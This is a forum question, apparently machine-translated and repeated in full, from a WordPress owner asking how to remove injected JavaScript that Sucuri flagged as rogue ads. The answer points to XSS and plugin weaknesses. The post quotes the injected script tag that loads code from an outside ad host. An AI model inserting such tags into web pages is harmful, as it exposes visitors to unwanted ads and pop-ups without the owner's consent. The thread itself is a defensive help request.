如何删除 wordpress 站点中的 javascript 恶意软件
How to remove javascript malware in wordpress site
这是我的网站 -(出于安全原因,使用来自 XSS 漏洞的恶意软件编辑网站 URL)
我在 wordpress 中创建了这个网站,在 google 广告停止并警告我后突然意识到我的网站中有恶意软件。
以下是 sucuri sitecheck 发现的恶意软件。
<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1903718"></script>
<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1903718"></script>
我所有其他的 wordpress 网站都有同样的恶意软件,但我的硬编码网站没有任何恶意软件。我想知道是什么导致这些恶意软件在我多次重新安装 wordpress 之后一次又一次地出现。我需要帮助删除恶意软件,让它们不再出现。
请帮助我。
在此处了解有关跨站点脚本的更多信息:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Wordpress 通常容易受到评论形式的 XSS 攻击、各种插件、wordpress 管理员缺乏良好的安全强化实践,甚至来自 Google 和其他广告供应商的广告。
您在 Sucuri Site Check 中的具体问题指出:
Malware entry: rogueads.unwanted_ads
Description: Varios malicious injections that result in displaying ads (or opening pop-up or pop-under windows)without site owner's consent. Such injections may utilize scripts from legitimate ad networks
你可能应该尝试找出漏洞利用的来源并修复它,你最好的选择是 security.stackexchange.com 或者因为它是 wordpress - wordpress.stackexchange.com
这是我的网站 -(出于安全原因,使用来自 XSS 漏洞的恶意软件编辑网站 URL)
我在 wordpress 中创建了这个网站,在 google 广告停止并警告我后突然意识到我的网站中有恶意软件。
以下是 sucuri sitecheck 发现的恶意软件。
<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1903718"></script>
<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1903718"></script>
我所有其他的 wordpress 网站都有同样的恶意软件,但我的硬编码网站没有任何恶意软件。我想知道是什么导致这些恶意软件在我多次重新安装 wordpress 之后一次又一次地出现。我需要帮助删除恶意软件,让它们不再出现。
请帮助我。
在此处了解有关跨站点脚本的更多信息:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Wordpress 通常容易受到评论形式的 XSS 攻击、各种插件、wordpress 管理员缺乏良好的安全强化实践,甚至来自 Google 和其他广告供应商的广告。
您在 Sucuri Site Check 中的具体问题指出:
Malware entry: rogueads.unwanted_ads Description: Varios malicious injections that result in displaying ads (or opening pop-up or pop-under windows)without site owner's consent. Such injections may utilize scripts from legitimate ad networks
你可能应该尝试找出漏洞利用的来源并修复它,你最好的选择是 security.stackexchange.com 或者因为它是 wordpress - wordpress.stackexchange.com